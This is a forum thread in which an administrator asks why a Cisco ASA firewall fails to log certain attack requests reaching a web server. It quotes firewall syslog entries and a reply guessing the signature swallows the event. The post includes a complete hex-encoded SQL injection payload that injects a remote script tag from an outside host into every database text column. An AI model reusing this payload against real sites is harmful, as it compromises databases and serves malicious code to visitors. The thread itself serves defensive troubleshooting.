cancel
Showing results for 
Search instead for 
Did you mean: 
cancel
415
Views
0
Helpful
2
Replies

ASA not logging certian requests?

w-schultz
Level 1
Level 1

I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)

On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

The only thing I see in the ASA log's is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01

Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.

2 Replies 2

Thank you for the response.

I am well aware of the logging types, the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URI, just not this specific attack.

My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.

I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.

Getting Started

Find answers to your questions by entering keywords or phrases in the Search bar above. New here? Use these resources to familiarize yourself with the community: